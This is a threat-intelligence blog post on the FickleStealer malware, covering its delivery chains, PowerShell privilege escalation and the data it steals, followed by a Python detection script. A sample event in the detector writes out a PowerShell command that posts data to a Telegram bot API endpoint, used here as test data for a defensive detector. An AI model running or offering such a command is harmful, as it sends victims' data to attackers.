The PolySwarm Blog


FickleStealer

Jun 28, 2024 3:08:23 PM / by The Hivemind

Executive Summary

FickleStealer is a Rust-based stealer that targets Windows devices. It is distributed in a variety of ways and steals information, likely with the intent of using the information for follow-on attacks.

Key Takeaways

  • FickleStealer is a Rust-based stealer that targets Windows devices.
  • FickleStealer is distributed using at least four different methods, including a VBA dropper, a VBA downloader, a link downloader, and an executable downloader. 
  • The attack chain uses PowerShell scripts to bypass UAC, escalate privileges, and execute the malware. 
  • The stealer can steal a variety of information including that from crypto wallets, web browsers, AnyDesk, Discord, FileZilla, Signal, Skype, Steam, and Telegram. 

What is FickleStealer?

FickleStealer is a Rust-based stealer that targets Windows devices. It is distributed in a variety of ways and steals information, likely with the intent of using the information for follow-on attacks. Fortinet discovered the malware in May 2024 and recently reported on FickleStealer. 

FickleStealer is distributed using at least four different attack methods, including a VBA dropper, a VBA downloader, a link downloader, and an executable downloader. 

  • The VBA dropper attack chain begins with a Word document containing a macro that loads an XML file and executes an encoded script in that file. The script, in turn, drops and executes FickleStealer.
  • The VBA downloader attack chain leverages Word documents. One downloader downloads the PowerShell script bypass.ps1 directly. A second leverages an executable to evade detections that limit the use of cmd. A third indirectly delivers the VBA downloader using an embedded web browser control in the document.
  • The link downloader directly downloads the PowerShell script.
  • The executable downloader is a .NET executable masquerading as a PDF viewer.

The attack chain uses PowerShell scripts to bypass UAC, escalate privileges, and execute the malware. A PowerShell script also sends information about the victim’s machine to a threat actor-controlled Telegram bot.
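As an added example (not part of the PolySwarm bulletin or Fortinet’s report), the following Python triage logic flags the delivery-chain stages described above in constructed Sysmon-style process events: Word spawning PowerShell, a PowerShell command line referencing bypass.ps1, and a PowerShell process contacting the Telegram Bot API host api.telegram.org, which the bulletin does not name and is assumed here.

```python
import json
import ntpath

OFFICE_PARENTS = {"winword.exe"}                 # Word documents carry the VBA macros
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# Public host of Telegram's Bot API; the bulletin only says "Telegram bot" (assumption).
TELEGRAM_API_HOST = "api.telegram.org"

# Constructed process-creation events in a Sysmon-like JSONL shape (not real telemetry).
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"pid": 101, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "WINWORD.EXE invoice.docm"},
    {"pid": 102, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": r"powershell.exe -File C:\Users\Public\bypass.ps1"},
    {"pid": 103, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Invoke-RestMethod https://api.telegram.org/bot<TOKEN>/sendMessage"},
    {"pid": 104, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "powershell.exe Get-Process"},
])


def _base(path):
    # ntpath handles Windows-style paths regardless of the analyst's host OS
    return ntpath.basename(path).lower()


def classify(event):
    """Return the chain stages a single event matches, or an empty list."""
    image, parent = _base(event["image"]), _base(event["parent_image"])
    cmd = event["cmdline"].lower()
    hits = []
    if image in SCRIPT_HOSTS and parent in OFFICE_PARENTS:
        hits.append("office-spawned-powershell")   # VBA dropper/downloader stage
    if image in SCRIPT_HOSTS and "bypass.ps1" in cmd:
        hits.append("bypass-script")               # script name given in the bulletin
    if image in SCRIPT_HOSTS and TELEGRAM_API_HOST in cmd:
        hits.append("telegram-beacon")             # victim-info sent to the bot
    return hits


def triage(jsonl):
    """Map pid -> matched stages for every suspicious event in a JSONL feed."""
    out = {}
    for line in jsonl.splitlines():
        if line.strip():
            ev = json.loads(line)
            if hits := classify(ev):
                out[ev["pid"]] = hits
    return out


if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, hits)
```

Benign PowerShell launched from explorer.exe (pid 104) produces no hit, so the three stage labels can be combined into a higher-confidence alert when they appear together in one process tree.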

FickleStealer’s payload is protected by a packer masquerading as a legitimate executable. It is likely the threat actor developed the packer by replacing a portion of the code in a legitimate executable with the packer’s code, allowing it to evade static analysis. The payload runs a series of anti-analysis checks for sandbox and virtual machine environments before beaconing to a remote server to exfiltrate data.

The stealer can steal a variety of data, including data from crypto wallets, web browsers, AnyDesk, Discord, FileZilla, Signal, Skype, Steam, and Telegram. It is capable of exfiltrating files with the following extensions: .txt, .kdbx, .pdf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, and .odp, as well as wallet.dat files. FickleStealer is also flexible in that it can receive a target list from the server. According to Fortinet, FickleStealer appears to still be in active development and is considered a high-severity threat.

IOCs

PolySwarm has multiple samples associated with this activity.

You can use the following CLI command to search for all FickleStealer samples in our portal:

$ polyswarm link list -f FickleStealer
